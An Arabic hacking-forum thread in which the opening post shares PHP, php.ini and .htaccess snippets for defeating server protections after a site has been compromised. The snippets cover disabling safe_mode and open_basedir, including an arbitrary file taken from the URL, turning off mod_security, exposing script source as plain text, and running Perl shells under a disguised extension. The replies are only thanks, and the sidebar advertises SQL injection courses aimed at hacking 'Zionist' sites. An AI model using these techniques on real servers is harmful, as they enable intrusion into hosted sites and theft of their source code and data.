1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ شرح ] الفرق بين تخطي حمايات php و apache خطأ يقع فيه الكثير

الموضوع في 'آمن المواقع والسيرفرات' بواسطة أمير عرش الدموع, بتاريخ ‏23 يونيو 2013.

كاتب الموضوع : أمير عرش الدموع المشاهدات : 1,684 الردود : 8 ‏23 يونيو 2013
حالة الموضوع:
مغلق
  1. غير متصل

    أمير عرش الدموع
    DeveloPer Plus

    عضو منذ:
    ‏25 يناير 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    الإقامة:

    السلام عليكم و رحمة الله تعالى و بركاته
    أنا جمعت بعض الأكواد ان شاء الله تفيدكم
    هنالك فرق في التخطي
    الأول هو التخطي السيف مود و يكون في اصدارات php
    مثال هدا الكود في ini.php

    كود PHP:
    <?
    echo 
    ini_get("safe_mode");
    echo 
    ini_get("open_basedir");
    include(
    $_GET["file"]);
    ini_restore("safe_mode");
    ini_restore("open_basedir");
    echo 
    ini_get("safe_mode");
    echo 
    ini_get("open_basedir");
    include(
    $_GET["ss"]);
    ?>
    و كدلك ملف php.ini

    كود PHP:
    short_open_tag On
    log_errors 
    On
    log_errors_max_len 
    1024
    ignore_repeated_errors 
    On
    register_globals 
    Off
    magic_quotes_runtime 
    Off
    magic_quotes_gpc 
    On
    allow_url_fopen 
    on
    AddHandler application
    /x-httpd-php4 .php
    display_errors 
    Off
    disable_functions 
    Bypass By ReD
    safe_mode 
    Off
    ملاحظة : هده الطريقة لا تتخطى جميع الاصدارات
    لكن تتخطى في كثير من الأحيان
    نجي الأن ما يخص تخطي apache الاباتشي أو ليتسبيد
    لما نريد عمل اختصار مجلد أو عمل سملنك لملف معين
    يطلع معانا خطأ Forbidden + Internal Server Error + 406 not acceptable
    نسوي هتاكسس و نشوف هدا الكود

    كود PHP:
    <IfModule mod_security.c>
    SecFilterEngine Off
    SecFilterScanPOST Off
    </IfModule
    DirectoryIndex seees.html
    Options 
    +Indexes
    AddType text
    /plain .php
    AddHandler server
    -parsed .php
    AddType text
    /plain .html
    AddType text
    /plain .pl
    AddType text
    /plain .asp
    AddType text
    /plain .htm
    AddType text
    /plain .shtml
    AddType text
    /plain .shtm
    AddType text
    /plain .htaccess
    Options all
    DirectoryIndex Sux
    .html
    AddType text
    /plain .php
    AddHandler server
    -parsed .php
    AddType text
    /plain .html 
    نجي نحلل هدا الهتاكسس
    هدا بيتخطى كثير الفوربدن

    كود PHP:
    Options all
    DirectoryIndex Sux
    .html
    AddType text
    /plain .php
    AddHandler server
    -parsed .php
    AddType text
    /plain .html
    أما بالنسبة ل 406 not acceptablr
    فالحل هو هدا

    كود PHP:
    <IfModule mod_security.c>
    SecFilterEngine Off
    SecFilterScanPOST Off
    </IfModule
    أما Internal Server Error
    فهدا الكود بيتخطاه


    كود PHP:
    DirectoryIndex seees.html
    Options 
    +Indexes
    AddType text
    /plain .php
    AddHandler server
    -parsed .php
    AddType text
    /plain .html
    AddType text
    /plain .pl
    AddType text
    /plain .asp
    AddType text
    /plain .htm
    AddType text
    /plain .shtml
    AddType text
    /plain .shtm
    AddType text
    /plain .htaccess
    اه كمان شئ مهم
    مثلا لو أريد تشغيل البيرل كمثال في السرفر
    رح أحط مثلا في الهتاكسس هون AddType application/x-httpd-cgi.red
    مع انشاء ملف اخر بيرل يكون shellperl.red
    ما الى هدا هناك طرق كثييييرة جدا في التخطي
    و ارجو من الشباب التفريق ما بين هدان الأمرين
    والله ولي التوفيق
    سلام :{1}:​
     


    جاري تحميل الصفحة...
  2. غير متصل

    روبورت1 <img src="http://im34.gulfup.com/s2o63.gif"><br>فر

    عضو منذ:
    ‏8 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
    كتب الله لك أجر كل من استفاد منها.

    * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
    حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

    هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.

     


  3. غير متصل

    ! ـآوتآر !
    DeveloPer Plus

    عضو منذ:
    ‏19 يوليو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:
    الإقامة:

    رد: الفرق بين تخطي حمايات php و apache خطأ يقع فيه الكثير

    *

    وٌعٌلَيِکمً الَسِلَامً وٌرحًمًة الَلَهّ وٌبًرکاتٌتٌهّ

    يِعٌطِيِک الَعٌافُيِة

    تٌسِسِلَمً يِمًيِنِک
     


  4. غير متصل

    Dr.HaMoOoD
    rank
    Developer

    عضو منذ:
    ‏17 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الوظيفة:
    اخترآق آجهزه آليهود
    الإقامة:

    رد: الفرق بين تخطي حمايات php و apache خطأ يقع فيه الكثير

    [ .. Good Job My Dear .. ]
     


  5. غير متصل

    SyR!@N Gh0$T
    rank
    Developer

    عضو منذ:
    ‏16 سبتمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    الإقامة:

    رد: الفرق بين تخطي حمايات php و apache خطأ يقع فيه الكثير

    وعليكم السلام ورحمة الله وبركاته

    يعطيك العافية ،،
     


  6. غير متصل

    GosTeR DZ
    DeveloPer Plus

    عضو منذ:
    ‏5 يناير 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    الإقامة:

    رد: الفرق بين تخطي حمايات php و apache خطأ يقع فيه الكثير

    تسلم الايادي يا بطل’,
     


  7. غير متصل

    BOT AL IRAQ
    DeveloPer Plus

    عضو منذ:
    ‏24 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    9
    نقاط الجائزة:
    الوظيفة:
    HACKING
    الإقامة:

    رد: الفرق بين تخطي حمايات php و apache خطأ يقع فيه الكثير

    السلام عليكم ...
    عاشت ايدك حبيبي ...
    تقبل مروري ...
    اخوك في الله ...
     


  8. غير متصل

    Scorpion
    rank
    Developer

    عضو منذ:
    ‏15 يونيو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الإقامة:

    رد: الفرق بين تخطي حمايات php و apache خطأ يقع فيه الكثير

    الله يعطيك العافية
     


  9. غير متصل

    فيصــــــــل
    rank
    Developer

    عضو منذ:
    ‏3 أغسطس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الإقامة:

    رد: الفرق بين تخطي حمايات php و apache خطأ يقع فيه الكثير

    رائع جدا وبارك الله فيك ​
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...